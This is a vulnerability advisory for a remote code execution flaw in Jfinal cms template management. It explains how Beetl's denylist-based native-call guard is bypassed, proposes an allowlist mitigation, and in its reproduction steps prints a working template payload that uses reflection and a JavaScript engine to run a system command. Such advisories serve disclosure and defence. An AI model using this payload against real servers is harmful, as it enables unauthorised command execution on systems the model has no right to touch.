## Jfinal cms Background RCE
### Introduction to Vulnerability
Jfinal cms is built on the lightweight JFinal web framework, uses Beetl as its template engine and MySQL as its database, and uses Bootstrap, Flat UI and similar frameworks on the front end. It supports multiple sites, OAuth2 authentication, account registration, password encryption, comments and replies, message notifications, site traffic statistics, article comment and page-view statistics, response management, permission management and more. Its back-end template management feature contains a command execution vulnerability.
### Vulnerability Impact
- <= v4.7.1
### Vulnerability Analysis
The template engine is Beetl, which lets templates call Java methods directly. Beetl applies some restrictions to these native calls (the default security manager below only denies a handful of `java.lang` classes by name), but they can be bypassed through Java reflection.
```java
package org.beetl.core;

// Beetl's default guard for native calls made from templates.
public class DefaultNativeSecurityManager implements NativeSecurityManager {
    public DefaultNativeSecurityManager() {
    }

    // Called for every native method invocation; returns true when the call is allowed.
    public boolean permit(String resourceId, Class c, Object target, String method) {
        if (c.isArray()) {
            return true;
        } else {
            String name = c.getName();
            String className = null;
            String pkgName = null;
            int i = name.lastIndexOf(46); // 46 is '.', split package from simple class name
            if (i == -1) {
                return true;
            } else {
                pkgName = name.substring(0, i);
                className = name.substring(i + 1);
                // Only four classes in java.lang are denied; anything else, including
                // java.lang.Class and javax.script.*, is permitted.
                return !pkgName.startsWith("java.lang") || !className.equals("Runtime") && !className.equals("Process") && !className.equals("ProcessBuilder") && !className.equals("System");
            }
        }
    }
}
```
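As an added mitigation example (this is not Beetl's or Jfinal cms's code), the denylist above can be replaced with an allowlist-based `NativeSecurityManager`: only explicitly listed classes may be called from templates, and reflection pivots such as `getClass`/`forName` are refused even on those. The package name is hypothetical, and registration via `GroupTemplate.setNativeSecurity(...)` is assumed from Beetl's API.

```java
package com.example.beetl; // hypothetical package, not part of Jfinal cms

import java.util.Set;

import org.beetl.core.NativeSecurityManager;

/**
 * Allowlist replacement for Beetl's DefaultNativeSecurityManager.
 * The default manager only denies four java.lang classes by name, so a template can
 * still reach java.lang.Class.forName(...) and javax.script.* and, from there, Runtime.
 * This manager permits native calls only on explicitly listed classes; everything else,
 * including reflection and scripting APIs, is refused.
 */
public class AllowlistNativeSecurityManager implements NativeSecurityManager {

    // Classes whose public methods templates may call. Extend deliberately, one class at a time.
    private static final Set<String> ALLOWED_CLASSES = Set.of(
            "java.lang.String",
            "java.lang.Integer",
            "java.lang.Long",
            "java.lang.Boolean",
            "java.lang.Math",
            "java.util.Date");

    // Methods that are never reachable, even on allowed classes (reflection entry points).
    private static final Set<String> DENIED_METHODS = Set.of(
            "getClass", "forName", "getClassLoader", "newInstance", "getMethod", "invoke");

    @Override
    public boolean permit(String resourceId, Class c, Object target, String method) {
        if (c == null || method == null) {
            return false;
        }
        // Unwrap arrays so that String[] is judged by the same rule as String.
        Class<?> base = c;
        while (base.isArray()) {
            base = base.getComponentType();
        }
        if (base.isPrimitive()) {
            return true;
        }
        if (DENIED_METHODS.contains(method)) {
            return false;
        }
        return ALLOWED_CLASSES.contains(base.getName());
    }
}
```

Register it on the template engine's `GroupTemplate` (assumed: `groupTemplate.setNativeSecurity(new AllowlistNativeSecurityManager())`) so the check applies to every template, and treat template editing itself as an administrative action that is logged and restricted.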
### Vulnerability Reproduction
1. Log in to the back end.
2. Open Template Management:
   http://localhost:8080/jfinal_cms/admin/filemanager/list

   Pick any template file to modify; here the `show_about.htm` template is used as the example. Write the payload into the template file and save it.
```
    ${@java.lang.Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc') ")}
```
3. Visit the about page to trigger the payload:
   http://localhost:8080/jfinal_cms/front/about